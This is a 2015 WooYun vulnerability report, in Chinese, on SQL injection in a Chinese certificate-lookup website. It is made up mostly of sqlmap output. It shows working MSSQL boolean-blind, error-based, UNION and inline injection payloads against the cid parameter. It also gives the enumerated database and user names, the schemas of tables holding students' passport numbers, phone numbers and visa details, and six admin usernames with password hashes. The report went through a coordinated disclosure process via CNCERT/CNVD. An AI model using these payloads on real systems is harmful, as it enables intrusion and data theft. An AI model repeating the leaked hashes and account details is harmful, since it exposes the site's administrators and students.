当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140792

漏洞标题:中国证书查询网SQL注入漏洞(泄露大量重要信息)

相关厂商:中国证书查询网

漏洞作者: 路人甲

提交时间:2015-09-15 09:37

修复时间:2015-11-01 15:34

公开时间:2015-11-01 15:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

中国证书查询网注入漏洞,泄露大量重要信息。。。。

详细说明:

通过注入漏洞,可以跑出网站大量重要信息,其中包括管理员账号和密码,只不过密码解不出来,无法进行下一步检测。。。。
注入漏洞:http://**.**.**.**/online_join.asp?cid=1
多达16个数据库。。。

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (
original value)
    Payload: cid=(SELECT (CASE WHEN (8709=8709) THEN 1 ELSE 8709*(SELECT 8709 FR
OM master..sysdatabases) END))
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cid=1 AND 4384=CONVERT(INT,(CHAR(58) CHAR(97) CHAR(99) CHAR(119) CH
AR(58) (SELECT (CASE WHEN (4384=4384) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58)
 CHAR(111) CHAR(100) CHAR(113) CHAR(58)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: cid=-3936 UNION ALL SELECT CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHA
R(58) CHAR(82) CHAR(65) CHAR(80) CHAR(78) CHAR(72) CHAR(116) CHAR(82) CHAR(85) C
HAR(75) CHAR(78) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58),NULL--
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: cid=(SELECT CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) (SELECT (
CASE WHEN (7556=7556) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(
100) CHAR(113) CHAR(58))
---
[20:13:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[20:13:49] [INFO] fetching database names
[20:13:50] [INFO] the SQL query used returns 16 entries
available databases [16]:
[*] 360beikao
[*] 86690003_201311
[*] 86690003_201411
[*] 86690003_com
[*] baodicanyin
[*] beixinyuan
[*] cnzscxdata
[*] cnzscxdata_2015
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] ShangHui
[*] tempdb
[*] xueyuan
current database:    'cnzscxdata'
current user:    'cnzscxdata_u'
7个用户:
[20:15:29] [INFO] the SQL query used returns 7 entries
[20:15:29] [INFO] retrieved: "86690003_com"
[20:15:30] [INFO] retrieved: "baodicanyin"
[20:15:30] [INFO] retrieved: "BUILTIN\\\\Administrators"
[20:15:30] [INFO] retrieved: "cnzscxdata_u"
[20:15:31] [INFO] retrieved: "sa"
[20:15:31] [INFO] retrieved: "shanghui"
[20:15:32] [INFO] retrieved: "SUPERNIC-56FF19\\\\SQLDEBUGGER"
database management system users [7]:
[*] 86690003_com
[*] baodicanyin
[*] BUILTIN\\Administrators
[*] cnzscxdata_u
[*] sa
[*] shanghui
[*] SUPERNIC-56FF19\\SQLDEBUGGER


1.png


2.png


3.png


4.png


5.png


漏洞证明:

数据库中含有大量学生的敏感信息。。。。。

Database: cnzscxdata
[34 tables]
+---------------------------+
| dtproperties              |
| icetu_Admin               |
| icetu_Advertisement       |
| icetu_Cert                |
| icetu_CertSample          |
| icetu_City                |
| icetu_College             |
| icetu_Number              |
| icetu_Province            |
| icetu_RecruitStudentsInfo |
| icetu_UserMessage         |
| icetu_activeText          |
| icetu_adChannal           |
| icetu_join                |
| icetu_manager             |
| icetu_news                |
| icetu_regUser             |
| icetu_renzheng            |
| kk358_Admin               |
| kk358_Agencies            |
| kk358_Application         |
| kk358_ApplicationOrders   |
| kk358_Courses             |
| kk358_Messages            |
| kk358_MigrationClients    |
| kk358_News                |
| kk358_RegisteredCourses   |
| kk358_Schedule            |
| kk358_Schools             |
| kk358_StayHomes           |
| kk358_Students            |
| kk358_Travel              |
| sysconstraints            |
| syssegments               |
+---------------------------+
Database: cnzscxdata
Table: icetu_Admin
[7 columns]
+------------------+---------------+
| Column           | Type          |
+------------------+---------------+
| CurrentLoginIP   | nvarchar      |
| CurrentLoginTime | smalldatetime |
| Flag             | nvarchar      |
| LastLoginIP      | nvarchar      |
|
| PassWord         | nvarchar      |
| UserName         | nvarchar      |
+------------------+---------------+
Database: cnzscxdata
Table: kk358_Students
[20 columns]
+-----------------+---------------+
| Column          | Type          |
+-----------------+---------------+
| AgentId         | int           |
| AreaId          | int           |
| AsscNo          | nvarchar      |
| BirthDay        | smalldatetime |
| ContactPersonId | int           |
| ContactPhone    | nvarchar      |
| CreateDate      | smalldatetime |
| CreateUser      | nvarchar      |
| CurrentUser     | nvarchar      |
| Email           | nvarchar      |
| ExpireDate      | smalldatetime |
| FullName        | nvarchar      |
| GraduationDate  | nvarchar      |
| id              | int           |
| LastUpdateDate  | smalldatetime |
| LastUpdateUser  | nvarchar      |
| Mobile          | nvarchar      |
| PassportNo      | nvarchar      |
| Telephone       | nvarchar      |
| VisaType        | nvarchar      |
+-----------------+---------------+
Database: cnzscxdata
Table: kk358_Admin
[12 columns]
+------------------+---------------+
| Column           | Type          |
+------------------+---------------+
| AreaId           | nvarchar      |
| BrowseFlag       | int           |
| CurrentLoginIP   | nvarchar      |
| CurrentLoginTime | smalldatetime |
| Flag             | nvarchar      |
| ID               | int           |
| LastLoginIP      | nvarchar      |
| LastLoginTime    | smalldatetime |
| Options          | nvarchar      |
| PassWord         | nvarchar      |
| UserGroup        | tinyint       |
| UserName         | nvarchar      |
+------------------+---------------+
Database: cnzscxdata
Table: kk358_Admin
[6 entries]
+------------+------------------+-----------+
| UserName   | PassWord         | UserGroup |
+------------+------------------+-----------+
| accountant | 21e09df36d23bf1c | 3         |
| admin      | 3144d570f6b2bf3b | 0         |
| newuser    | 42b452ccbe28c89e | 0         |
| OMSyd      | a9921913b1d203b0 | 2         |
| GMSyd      | b94e3172b87abc2b | 1         |
| officer    | cbf64331dddd69eb | 4         |
+------------+------------------+-----------+


5.png


6.png


7.png


修复方案:

就这样吧。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-17 15:32

厂商回复:


CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件 通报

最新状态:

暂无